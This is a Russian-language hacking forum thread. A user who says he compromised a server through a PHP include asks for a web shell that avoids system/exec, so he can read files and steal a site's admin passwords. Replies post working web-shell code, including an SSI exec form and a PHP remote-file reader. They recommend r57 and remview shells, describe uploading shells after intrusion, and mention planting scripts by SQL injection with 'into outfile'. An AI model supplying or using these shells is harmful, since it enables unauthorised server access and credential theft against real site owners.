![]() |
Нужен веб-шелл без использования system, passthru,exec,etc
Здравствуйте! Вчера мне довелось взяться за взлом одного сервака, нашёл там php-include, получил веб-шелл. Хочу получить пароли от админки одого сайта, пытался использовать утилиту cat для чтения php-файлов с паролями, но везде на нужных мне файлах стоят чмоды -rw-r--r-- , этот способ почему-то не проходит, при обычном обращении к таким php-файлам через браузер они исполняются интерпритатором, поэтому мне кажется, что эти файлы можно прочитать с помощью такого веб-шелла, где не используются system, passthru,exec,etc, а используются такие php-функции как chdir(), fpassthru() и т.д.
Использовать сплойт для ядра пока что не хочу, а Программировать нормально на php я пока что не умею, поэтому прошу вас подсказать мне публичные веб-шеллы такого типа, помогите, please! |
CODE
<html> <body> <script language="JavаScript"> <!-- function execute() { var cmd = document.exec.cmd.value; document.write('<html><body><!--#exec cmd="'+cmd+'"--></body></html>'); } //--> </script> <form name="exec"> <input type="text" name="cmd" size="20" value=""> <input type="submit" value="exec" onClick="execute()"> </form> </body> </html> |
Покури форум еще!! Вот на форуме давно кто-то выложил!
<?php $file=""; $tem=""; $temp=tempnam($tem, "cx"); if(copy("http://".$file, $temp)) { $otrit = fopen($temp, "r"); $pokaz = fread($otrit, filesize($temp)); fclose($otrit); echo htmlspecialchars($pokaz); unlink($temp); } ?> |
Цитата:
|
Есть , но стоит денег! Поставь хоть +! :)
Потыкай вот это еще Код:
<? |
Цитата:
|
Цитата:
|
PHP код:
Вот. Значит, будет у тебя поле, куда будешь писать PHP-код, а потом нажимать на кнопку, и он будет исполняться. =========== Вот код для просмотра текущей директории: PHP код:
А вот для файла: PHP код:
<xmp> - для того, чтоб теги не работали, а показывались напрямую: слово -> <i>слово</i> ================= Есть еще шелл, не использующий system: http://php.spb.ru/remview/ |
В 2 словах при включенном Safe-mode юзай просто r57 шелл он позволяет просмотреть директории на сервере и прочитать файлы+ используй все что я скинул и последнее.
Я обычно делаю так: 1. Заливаю r57 , потом свой самопал , затем права(если nobody), то все в шляпе можешь просмотреть все на сервере почти. |
Береги себя!!! Стучи 1-869-53два!
|
<xmp> - для того, чтоб теги не работали, а показывались напрямую: слово -> <i>слово</i>
а тогда накой штмлспециалчарс??? |
Да. Ты прав. Здесь можно обойтись одним лишь htmlspecialchars. Это лишнюю работу я сделал, написав <xmp>, </xmp>.
|
Цитата:
|
Да я их не поднимаю ! Это если ты похакал и права nobody(тогда на сервере можешь просматривать все диры и файлы!)!
|
Или права httpd или apache и www!!!!
|
А. Твой скрипт стопудово будет с правами, от которых работает Apache.
Которые могут быть nobody. Или может быть создан специальный юзверь www. |
да это не от скрипта зависит пойми! А от настроек сервера!
|
SkyMan
fly Пишите полный бред. Цитата:
Все зависит от группы. Как правило ты не пожешь просматривать Цитата:
Цитата:
|
Я понимаю, что ты умный очень. Но я объяснил человеку который плохо понимает, что делает. Походу дорогу я тебе перебежал. !:) Кста он меня понял, а вот тебя врядли. Не лечи доктор.
С nobody я просмотрю все на сервере и с apache тоже. Практика большая, хоть и не Гуру! |
>> свой chmod и все будет будет работать(apache), а ты ее просмотреть не сможешь.
Тут не спорю, но часто все нормально проходит. |
cash я имел в виду то, что если свой скрипт сделаешь, например, через sql-иньекцию с помощью "into outfile", то он будет работать под учетной записью, под которой работает Apache (а это прописано в httpd.conf).
|
Цитата:
fly, ты вобще в принципе понимаешь, что значит права в *nix'ах? Почитай получше, что такое права владельца (пользователя), что такое права группы, что такое права других (other). Это тебе сплоиты получается не нужны, так как ты /etc/shadow или /etc/master.passwd можешь прочитать расшифровать и пользовать рута, а уж kmem под фряху сделали специально для того чтобы тебе все усложнить... да и за чем собственно рут? у тебя и с nobody все отлично получться будет... и вобще вот они дураки (разработчики unix) какието там права придумали, зачем то суетились... не знали тогда недальновидные, что некий fly родится и всю их задумку на корню похерет... :D ЗЫ короче RTFM! |
Цитата:
|
Цитата:
Цитата:
вот cash нормально пояснил, покрайней мере правильно. Слышь fly, а если openbase_dir стоит то чё один хрен всё посмотришь без сплоитов, да ? Гуру бля... |
Цитата:
лано, хорош флеймить... fly не вводи людей(не знающих, таких же как ты) в заблуждения... Еще раз: RTFM! |
Вопрос давно решен,флейм я не развожу! Я помог человеку вот и все!
|
| Время: 06:18 |